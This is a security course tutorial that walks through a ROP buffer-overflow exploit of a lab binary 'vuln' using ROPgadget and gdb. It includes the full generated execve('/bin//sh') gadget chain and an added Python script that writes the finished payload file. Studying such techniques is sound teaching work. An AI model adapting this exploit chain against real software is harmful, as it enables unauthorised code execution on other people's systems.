COMSM0049

Let's say you have a binary called vuln and you want to build a ROP-based exploit for it using ROPgadget. The binary takes a file name as its argument and reads that file, so the overflow is delivered through the file contents.

  1. Run:

     ./ROPgadget.py --binary vuln --ropchain > out-rop.txt
    
  2. Open out-rop.txt (normally a huge file); it lists every gadget ROPgadget found.
  3. Scroll down to the end, until you see:

     ROP chain generation
     =================================================
    
    
  4. If ROPgadget manages to build a chain for you, the steps it took are printed below that point. Read them for your understanding.
  5. There should be a line starting with "Step 5 – Build the ROP chain". Copy everything below that line into a separate file and name it, for example, exploit.py. The content of exploit.py should be:

         #!/usr/bin/env python2
         # execve generated by ROPgadget
         from struct import pack
         # Padding goes here
         p = ''
         p += pack('<I', 0x0806ee8b) # pop edx ; ret
         p += pack('<I', 0x080da060) # @ .data
         p += pack('<I', 0x080a8bf6) # pop eax ; ret
         p += '/bin'
         p += pack('<I', 0x08056d05) # mov dword ptr [edx], eax ; ret
         p += pack('<I', 0x0806ee8b) # pop edx ; ret
         p += pack('<I', 0x080da064) # @ .data + 4
         p += pack('<I', 0x080a8bf6) # pop eax ; ret
         p += '//sh'
         p += pack('<I', 0x08056d05) # mov dword ptr [edx], eax ; ret
         p += pack('<I', 0x0806ee8b) # pop edx ; ret
         p += pack('<I', 0x080da068) # @ .data + 8
         p += pack('<I', 0x080562c0) # xor eax, eax ; ret
         p += pack('<I', 0x08056d05) # mov dword ptr [edx], eax ; ret
         p += pack('<I', 0x080481c9) # pop ebx ; ret
         p += pack('<I', 0x080da060) # @ .data
         p += pack('<I', 0x0806eeb2) # pop ecx ; pop ebx ; ret
         p += pack('<I', 0x080da068) # @ .data + 8
         p += pack('<I', 0x080da060) # padding without overwrite ebx
         p += pack('<I', 0x0806ee8b) # pop edx ; ret
         p += pack('<I', 0x080da068) # @ .data + 8
         p += pack('<I', 0x080562c0) # xor eax, eax ; ret
         p += pack('<I', 0x0807c32a) # inc eax ; ret
         p += pack('<I', 0x0807c32a) # inc eax ; ret
         p += pack('<I', 0x0807c32a) # inc eax ; ret
         p += pack('<I', 0x0807c32a) # inc eax ; ret
         p += pack('<I', 0x0807c32a) # inc eax ; ret
         p += pack('<I', 0x0807c32a) # inc eax ; ret
         p += pack('<I', 0x0807c32a) # inc eax ; ret
         p += pack('<I', 0x0807c32a) # inc eax ; ret
         p += pack('<I', 0x0807c32a) # inc eax ; ret
         p += pack('<I', 0x0807c32a) # inc eax ; ret
         p += pack('<I', 0x0807c32a) # inc eax ; ret
         p += pack('<I', 0x08049603) # int 0x80
    
  6. Now create another text file, test.txt, with the following content (each letter repeated four times, so every 4-byte word on the stack is recognisable): AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNN

  7. Run gdb vuln and, at the gdb prompt, r test.txt
  8. You will see a SIGSEGV, i.e. a crash with the message:

     Program received signal SIGSEGV, Segmentation fault.
     0x4c4c4c4c in ?? ()
    
  9. Notice that 0x4c is the ASCII code for L: the saved return address was overwritten with LLLL, so the 11 letters A to K, i.e. 11x4=44 bytes, sit between the start of the buffer and the saved return address (in test.txt, LLLL begins at the 45th character). Those 44 bytes are the padding.
  10. Open exploit.py and edit the following line:

        # Padding goes here
        p = 'A'*44 # 44 bytes of padding, so the chain starts exactly at the saved return address
    
  11. Add the following lines at the end of exploit.py:

        fileName=raw_input("Enter the file name: ")
        outfile=open(fileName, "wb")
        outfile.write(p)
        outfile.close()
    
  12. Now run python2 exploit.py. It will ask for a file name: enter rop.bin
  13. Finally run:

        ./vuln rop.bin
    
  14. If everything goes fine, the chain calls execve("/bin//sh") and you get a shell prompt instead of the program's normal output. Done!
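The same procedure (steps 6 to 12) in one Python 3 script, added here as an example; it is not part of the course notes or of ROPgadget. It recovers the padding offset from the EIP value gdb printed instead of counting letters by hand, rebuilds the chain from step 5 with bytes (Python 3 has no str/bytes mixing), and scans the payload for bytes that a different input routine would choke on. The gadget addresses are the ones ROPgadget emitted for the notes' vuln binary and only apply to that binary; the Metasploit-style cyclic pattern (pattern_create) is an assumed helper for buffers longer than the 56-byte probe, and whether a 0x0a byte matters depends on how vuln reads its file (fread-style readers do not care, fgets-style ones truncate), which the notes do not say.

```python
#!/usr/bin/env python3
"""Added example (not from the course notes): find the return-address offset from the
gdb crash value, then write padding + ROP chain to the input file, with a bad-byte check.
Gadget addresses are specific to the notes' vuln binary (ROPgadget output, step 5)."""
import string
import struct
from typing import List, Tuple

# Constructed input: the same probe file the notes use in step 6.
PROBE = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNN"


def pattern_create(length: int) -> bytes:
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...). Its 4-byte windows are unique
    within the first 20280 bytes, so it also works where the probe's repeated
    letters would be ambiguous (assumed helper, not from the notes)."""
    out = bytearray()
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern too long to stay unique")


def pattern_offset(pattern: bytes, eip: int) -> int:
    """Offset of the 4 bytes that landed in EIP. gdb prints the faulting address as a
    number, so pack it little-endian to get the bytes as they sat in the file.
    Returns -1 if the value did not come from the pattern (e.g. a different crash)."""
    return pattern.find(struct.pack("<I", eip))


def rop_chain() -> bytes:
    """execve("/bin//sh", argv, envp) chain as ROPgadget emitted it for the notes' vuln:
    write the string into .data with mov [edx], eax, point ebx/ecx/edx at it,
    count eax up to 11 (__NR_execve on 32-bit Linux) and trap with int 0x80."""
    data = 0x080da060                 # @ .data: writable scratch for "/bin//sh\0"
    pop_edx, pop_eax, pop_ebx = 0x0806ee8b, 0x080a8bf6, 0x080481c9
    pop_ecx_ebx = 0x0806eeb2          # pop ecx ; pop ebx ; ret
    mov_edx_eax = 0x08056d05          # mov dword ptr [edx], eax ; ret
    xor_eax, inc_eax, int80 = 0x080562c0, 0x0807c32a, 0x08049603
    chain = [
        pop_edx, data, pop_eax, b"/bin", mov_edx_eax,        # .data     = "/bin"
        pop_edx, data + 4, pop_eax, b"//sh", mov_edx_eax,    # .data + 4 = "//sh"
        pop_edx, data + 8, xor_eax, mov_edx_eax,             # .data + 8 = 0 (terminator)
        pop_ebx, data,                                       # ebx = path
        pop_ecx_ebx, data + 8, data,                         # ecx = argv (-> NULL), ebx kept
        pop_edx, data + 8,                                   # edx = envp (-> NULL)
        xor_eax, *([inc_eax] * 11),                          # eax = 11 = execve
        int80,
    ]
    return b"".join(x if isinstance(x, bytes) else struct.pack("<I", x) for x in chain)


def find_bad_bytes(payload: bytes, bad: bytes = b"\x00\n") -> List[Tuple[int, int]]:
    """(offset, byte) pairs for bytes an input routine might stop on: NUL for
    string copies, newline for fgets()/scanf(). A whole-file read (what the notes'
    vuln appears to do, since the chain works) is not affected."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def build_payload(offset: int, chain: bytes) -> bytes:
    """Padding up to the saved return address, then the chain (step 10)."""
    return b"A" * offset + chain


def write_payload(path: str, payload: bytes) -> int:
    """Step 11/12: write the file vuln will be given as its argument."""
    with open(path, "wb") as f:
        return f.write(payload)


if __name__ == "__main__":
    off = pattern_offset(PROBE, 0x4c4c4c4c)   # the value gdb printed in step 8
    payload = build_payload(off, rop_chain())
    print(f"offset {off}, payload {len(payload)} bytes, bad bytes at {find_bad_bytes(payload)}")
    write_payload("rop.bin", payload)
```

The bad-byte scan reports the two copies of the pop eax gadget (0x080a8bf6), whose third byte is 0x0a: harmless for a binary that reads the whole file, but the reason the same chain would silently break against a program that reads its input with fgets(). ROPgadget's automatic chain also hard-codes absolute addresses inside vuln, so it assumes the binary is not position-independent; check with `file vuln` before blaming the offset if the shell does not appear.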